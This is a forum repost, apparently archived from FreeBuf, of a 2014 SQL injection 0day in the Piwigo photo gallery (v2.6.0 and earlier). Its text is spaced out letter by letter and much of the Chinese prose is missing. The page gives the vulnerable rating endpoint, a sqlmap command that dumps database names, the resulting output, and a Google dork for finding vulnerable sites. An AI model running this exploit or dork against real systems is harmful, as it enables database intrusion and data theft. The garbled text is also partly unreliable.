搜索

[8427] 2014-11-15_免费开源相册Piwigo=v2.6.0SQL注入漏洞(0day)

文档创建者:s7ckTeam
浏览次数:34
最后更新:2025-01-17
2014-11-15_免费开源相册Piwigo=v2.6.0SQL注入漏洞(0day) P i w i g o   < =   v 2 . 6 . 0   S Q L 0 d a y   F r e e B u f   2 0 1 4 - 1 1 - 1 5 P i w i g o P H P + M y S Q L 便 便 P i w i g o   < =   v 2 . 6 . 0 0 d a y , P i w i g o / p i w i g o / p i c t u r e . p h p j Q u e r y P i w i g o   < =   v 2 . 6 . 0 P O C ( ) ! / p i w i g o / p i c t u r e . p h p ? / 1 / c a t e g o r y / 1 & a c t i o n = r a t e   ( P O S T   p a r a m e t e r :   r a t e = 1 ) E x p l o i t i n g   w i t h   S Q L M a p : p y t h o n   s q l m a p . p y   - u   " h t t p : / / 1 9 2 . 1 6 8 . 2 4 4 . 1 2 9 / p i w i g o / p i c t u r e . p h p ? / 1 / c a t e g o r y / 1 & a c t i o n = r a t e " ;   - - d a t a " r a t e = 1 "   - - d b s [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   s e r v e r   o p e r a t i n g   s y s t e m :   L i n u x   U b u n t u   1 0 . 0 4   ( L u c i d   L y n x ) w e b   a p p l i c a t i o n   t e c h n o l o g y :   P H P   5 . 3 . 2 ,   A p a c h e   2 . 2 . 1 4 b a c k - e n d   D B M S :   M y S Q L   5 [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   f e t c h i n g   d a t a b a s e   n a m e s [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   f e t c h i n g   n u m b e r   o f   d a t a b a s e s [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   r e s u m e d :   4 [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   r e s u m e d :   i n f o r m a t i o n _ s c h e m a [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   r e s u m e d :   m y s q l [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   r e s u m e d :   p h p m y a d m i n [ 1 6 : 3 2 : 2 5 ]   [ I N F O ]   r e s u m e d :   p i w i g o a v a i l a b l e   d a t a b a s e s   [ 4 ] : [ * ]   i n f o r m a t i o n _ s c h e m a [ * ]   m y s q l [ * ]   p h p m y a d m i n [ * ]   p i w i g o
G o o g l e i n u r l : p i w i g o / p i c t u r e . p h p
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理